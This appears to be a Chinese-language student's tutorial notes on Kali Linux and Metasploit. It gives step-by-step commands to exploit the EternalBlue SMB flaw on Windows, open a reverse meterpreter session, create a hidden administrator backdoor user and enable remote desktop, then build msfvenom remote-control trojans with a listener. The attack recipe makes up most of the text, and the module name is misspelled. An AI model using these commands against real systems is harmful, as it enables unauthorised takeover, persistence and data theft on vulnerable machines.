提示:版权归Strawberry所有(大数据2202Byj)
未经授权,禁止搬用。
Q:2467175589
1.kali–msf渗透工具
1.体验-metasploit
1.msfconsole:启动metasploit命令行[命令行效率高,使用方便]
2.启动metesploit前需要做:
打开kali终端
使用sudo su命令,并输入kali的密码,切换到root用户
使用msfdb init命令,初始化metasploit数据库(*可选)
三个使用法则:
使用模块–>配置模块必选项–>运行模块
1.metasploit(1)windows永恒之蓝漏洞。
介绍:
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
*metasploit攻击永恒之蓝全流程
1.使用模块
use exploit/windows/smb/sm17_010_etemalblue
2.设置必选项
查看必选项[required为yes的就是必选项]
show options
3.设置必选项
set RHOSTS ip
set payload windows/x64/meterpreter/reverse_tcp
[payload是攻击载荷,就是攻击完想干啥,这里是获取meterpreter]
set lhost ip
[lhosts为listen host 代表你是谁,既kali的IP地址]
set lport 1-65535
[LPORT为listen port,代表你要在kali上开启的端口,1-65535随便选但是不能被占用]
4.运行模块,完成攻击
run
攻击成功后能干什么?
meterpreter是强大的后渗透模块,可以使用help查看帮助信息
远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统......
例如创建后门用户并开启远程连接
shell
net user zhangsan 123456 /add && net localgroup administrators zhangsan /add
exit
run getgui -e
2.生成远控木马
msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线
[msfvenom在shell里使用,不是msfconsole终端]
windows可执行程序后门:
1.启动远控程序
1.启动msfconsole
2.使用监听模块use exploit/multi/handler
3.设置set payload 跟上面msfvenom的payload选择一样的
4.set lhost kaliIP
5.set lport 上面的端口
6.启动模块run